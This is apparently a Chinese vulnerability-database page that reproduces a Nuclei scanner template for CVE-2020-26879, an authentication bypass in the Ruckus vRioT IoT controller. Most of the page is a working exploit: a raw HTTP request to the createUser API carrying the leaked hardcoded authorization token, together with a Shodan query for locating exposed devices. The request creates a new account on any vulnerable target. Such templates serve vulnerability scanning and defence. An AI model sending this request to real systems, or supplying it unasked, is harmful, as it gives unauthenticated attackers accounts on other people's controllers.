漏洞描述
Ruckus vRioT through 1.5.1.0.21 contains an API backdoor caused by a hardcoded token in validate_token.py,letting unauthenticated attackers interact with the API without authentication.
CVE-2020-26879: Ruckus vRioT IoT Controller - Authentication Bypass
PoC代码[已公开]
id: CVE-2020-26879
info:
name: Ruckus vRioT IoT Controller - Authentication Bypass
author: DhiyaneshDk
severity: critical
description: |
Ruckus vRioT through 1.5.1.0.21 contains an API backdoor caused by a hardcoded token in validate_token.py,letting unauthenticated attackers interact with the API without authentication.
reference:
- https://adepts.of0x.cc/ruckus-vriot-rce/
- https://adepts.of0x.cc
- https://twitter.com/TheXC3LL
- https://x-c3ll.github.io
- https://github.com/alphaSeclab/sec-daily-2020
- https://nvd.nist.gov/vuln/detail/CVE-2020-26879
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-26879
cwe-id: CWE-798
epss-score: 0.89452
epss-percentile: 0.99531
cpe: cpe:2.3:a:commscope:ruckus_vriot:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: commscope
product: ruckus_vriot
shodan-query: html:"RIoT Controller"
tags: cve,cve2020,ruckus,vriot,iot,api,backdoor,auth-bypass
variables:
username: "{{randstr_1}}"
password: "{{randstr_2}}"
http:
- raw:
- |
POST /service/v1/createUser HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Authorization: OlDkR+oocZg=
{"username": "{{username}}", "password": "{{password}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"ok": 1}'
- '{"message":'
condition: and
- type: word
part: body
words:
- 'Invalid JSON'
negative: true
- type: status
status:
- 200
# digest: 4b0a0048304602210091140207bf16b8bf23a4e9b7cbe3fe26042ddd90284a0512b30b0d3906c70624022100d9c391d3f0b8e3b27a8fc6da67f66ea95d4a201fdf7d69d665551ee19f6300d8:922c64590222798bb761d5b6d8e72950